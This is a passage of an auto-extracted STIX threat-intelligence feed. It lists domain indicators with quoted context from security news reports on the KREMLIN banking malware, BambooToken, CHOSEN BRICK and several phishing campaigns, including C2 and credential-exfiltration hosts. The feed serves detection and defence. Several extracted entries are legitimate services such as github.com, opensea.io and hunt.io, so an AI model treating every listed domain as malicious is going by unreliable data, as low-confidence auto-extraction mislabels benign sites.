News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f5dab23-372b-4ab1-ae20-3ac7159a1972","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: seguranca.versionnova.site","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: .]online Resolved WebSocket command-and-control host Domain seguranca[.]versionnova[.]site Infrastructure associated with a related KREMLIN branch","pattern":"[domain-name:value = 'seguranca.versionnova.site']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed3ee97d-8837-4772-8ce6-7f302177ac77","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: volmira.site","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: derevolucao[.]store Installer payload-hosting domain Domain volmira[.]site Extension hosting and credential-exfiltration infrastruct","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92a7087c-1f11-4b92-9e90-bc1d6b22f0ca","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: www.creamp1eonlyfans.net","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: ader beaconing and extension-delivery infrastructure Domain www[.]creamp1eonlyfans[.]net Network canary domain checked by KREMLIN Domain grander","pattern":"[domain-name:value = 'www.creamp1eonlyfans.net']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ba5a3ca7-32d5-49b8-9f47-c1d0d3fccffb","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: zaviro.online","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: n hosting and credential-exfiltration infrastructure Domain zaviro[.]online Exfiltration and fingerprinting infrastructure Domain gra","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b94ab4bb-bf2f-4fdf-a4e7-352cf48bb915","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: api.telegram.org","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: orjShare. Defenders should investigate unexpected access to api[.]telegram[.]org , backblazeb2[.]com , vultrobjects[.]com , storjshare[.","pattern":"[domain-name:value = 'api.telegram.org']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--891d0e58-9d58-480d-83df-fe1afd60e522","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: backblazeb2.com","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: uld investigate unexpected access to api[.]telegram[.]org , backblazeb2[.]com , vultrobjects[.]com , storjshare[.]io , iproyal[.]com an","pattern":"[domain-name:value = 'backblazeb2.com']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e666f38b-82a9-4af8-b498-790211327d21","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: iproyal.com","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: backblazeb2[.]com , vultrobjects[.]com , storjshare[.]io , iproyal[.]com and lightningproxies[.]net , particularly where such conn","pattern":"[domain-name:value = 'iproyal.com']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83c05901-ed48-42f2-affb-a5911b7a131d","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lightningproxies.net","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: , vultrobjects[.]com , storjshare[.]io , iproyal[.]com and lightningproxies[.]net , particularly where such connections do not align with n","pattern":"[domain-name:value = 'lightningproxies.net']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d05a3fc-50f7-48e6-be2d-20b1e2bf560c","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: storjshare.io","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: .]telegram[.]org , backblazeb2[.]com , vultrobjects[.]com , storjshare[.]io , iproyal[.]com and lightningproxies[.]net , particularly","pattern":"[domain-name:value = 'storjshare.io']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--386e742d-2897-45b0-83f9-c97aed22de6f","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: vultrobjects.com","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: pected access to api[.]telegram[.]org , backblazeb2[.]com , vultrobjects[.]com , storjshare[.]io , iproyal[.]com and lightningproxies[.]","pattern":"[domain-name:value = 'vultrobjects.com']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0bbabfb-ff72-4d0a-9496-20edb3466abd","created":"2026-09-16T05:18:06.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: github.com","description":"Seen in \"Active Exploitation Attempts Target WSO2 API Manager JWT Bypass With Forged Admin Tokens\" (The Hacker News). Context: ilable in the following pull requests for community users - github[.]com/wso2/carbon-apimgt/pull/13752 github[.]com/wso2/product-a","pattern":"[domain-name:value = 'github.com']","pattern_type":"stix","valid_from":"2026-09-16T05:18:06.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/active-exploitation-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a9ac3a54-af26-4a16-a654-1b22b65bb213","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: vip311.cc","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: e. Screenshots of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc ass","pattern":"[domain-name:value = 'vip311.cc']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--afb79f80-fe61-4249-af52-b361e70d7e92","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: zenplay77-x.space","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: o sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with PeckBirdy. The problem i","pattern":"[domain-name:value = 'zenplay77-x.space']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--99c9d0a7-1e31-485e-9aca-82ffc0db078f","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: zzyud.com","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: s of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with","pattern":"[domain-name:value = 'zzyud.com']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d1b1e61-3197-4b4e-ac86-57e4fab71c5d","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: luizestrelhashapr.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: filtrating browser data for each profile to its C2 server (\"luizestrelhashapr[.]online:443\") but not before requesting extensive access to brows","pattern":"[domain-name:value = 'luizestrelhashapr.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fee98d7d-a143-4023-bd84-f88d72bd4124","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: volmira.site","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: to the same Ethereum smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain th","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a105a8f5-4219-4b05-91d8-b5922cd810ec","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: zaviro.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: um smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain the browser extension","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc8e9f8a-dca8-4379-9445-5a1b3f784f0b","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: c2iznja.com","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: on the machine and exfiltrate them to the C2 server (\"api80.c2iznja[.]com\"). \"The domains used Cloudflare as a proxy for their infr","pattern":"[domain-name:value = 'c2iznja.com']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55ba5b41-a3ff-49ab-b3f0-b6bf53580c34","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: chat5188.tk","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: gather system details and transmit them to the C2 server (\"chat5188[.]tk\"). In response, the server issues commands to load a plug","pattern":"[domain-name:value = 'chat5188.tk']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0e52aa6-5cf2-4f44-aa62-a52eefc1d4f3","created":"2026-09-15T13:33:58.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hunt.io","description":"Seen in \"Thai Broadband Provider Hacked via Fortinet Vulnerability\" (SecurityWeek). Context: mand-and-control (C&C) platform for remote administration,” Hunt.io says. Next, the attackers used various scripts for host dis","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T13:33:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/thai-broadband-provider-hacked-via-fortinet-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--250915d7-fbd5-4e25-8096-7dd261425157","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: gets through redirect and tracking infrastructure including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . Th","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6982fdc-b74f-4da1-ba0d-348515380bcd","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: eightindigostove.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: 75-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was assessed as fake renewal scarew","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4a4ff50c-66e6-4f88-ba05-bf17c70c246e","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: loadswage.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ture including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was as","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e14989ef-d590-4b3f-9435-d22ae0cae3be","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: moolaah.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: d through Amazon Simple Email Service from the DKIM-aligned moolaah[.]com domain and urged recipients to open a supposed Mahnschrei","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cedf0007-97a3-447e-9ce7-9aaa3c850a22","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: opensea.io","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: itting a concealed POST request and eventually resolving to opensea[.]io during live analysis. Virus Bulletin’s Q3 2026 VBSpam tes","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4eece01-7bc4-48f9-ad2d-e7de88761be4","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: s IPv4 address 103[.]193[.]179[.]223 and redirected through web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ before ultimately reaching Google during verificati","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8f8ed4df-d1c7-494a-8f17-129ad0036b61","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ent reminder. No file was attached. Its embedded URL led to website-2df62808[.]mvplineup[.]com/audacity/underside , a first-stage page containing deco","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d25fe760-4037-4a50-b442-e22e92462e03","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xmasbrick.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: : Virus Bulletin). Sent from the DKIM-aligned but unrelated xmasbrick[.]com domain, the message embedded an IPv6-mapped address: hxxp","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e524f98c-6530-47ec-8540-fce2e6c3b567","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: of compromise (IoCs):- Type Indicator Description Hostname 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net Redirect infrastructure used in the antivirus renew","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e402e9e6-08dc-4aad-96d7-b5f10d7dd581","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: eightindigostove.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ssociated with the antivirus renewal phishing sample Domain eightindigostove[.]com Domain hosting the unsubscribe path in the antivirus rene","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9b310009-7182-4f86-adb5-965ffa73d402","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: loadswage.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: sed in the antivirus renewal scareware phishing flow Domain loadswage[.]com Redirect infrastructure associated with the antivirus ren","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fa1ac54b-e553-4f1d-a142-f15ea1a489ea","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: moolaah.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: path in the antivirus renewal phishing sample Sender domain moolaah[.]com DKIM-aligned sender domain used for the cloaked overdue-p","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--337910a7-4051-4f97-8a03-2c99dd73af26","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: opensea.io","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ing page used in the invoice phishing redirect chain Domain opensea[.]io Final destination reached after the cloaking and browser-","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5c34f031-23ea-4698-a928-0ed4b83c21a6","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: Pv4 address represented by the IPv6-mapped URL notation URL web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ Redirect destination in the Romanian PSD2 banking p","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fc554523-e50d-46b8-b075-0c94f18fab62","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: omain used for the cloaked overdue-payment invoice lure URL website-2df62808[.]mvplineup[.]com/audacity/underside First-stage cloaking page used in th","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75bd3da8-bec4-4d29-a382-ae0038cd6357","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xmasbrick.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: the cloaking and browser-fingerprinting stage Sender domain xmasbrick[.]com DKIM-aligned but unrelated sender domain used in the Roma","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--637c0986-2a77-48ba-b241-7763e61a76da","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: api.telegram.org","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ing in logging unexpectedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io ip","pattern":"[domain-name:value = 'api.telegram.org']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC 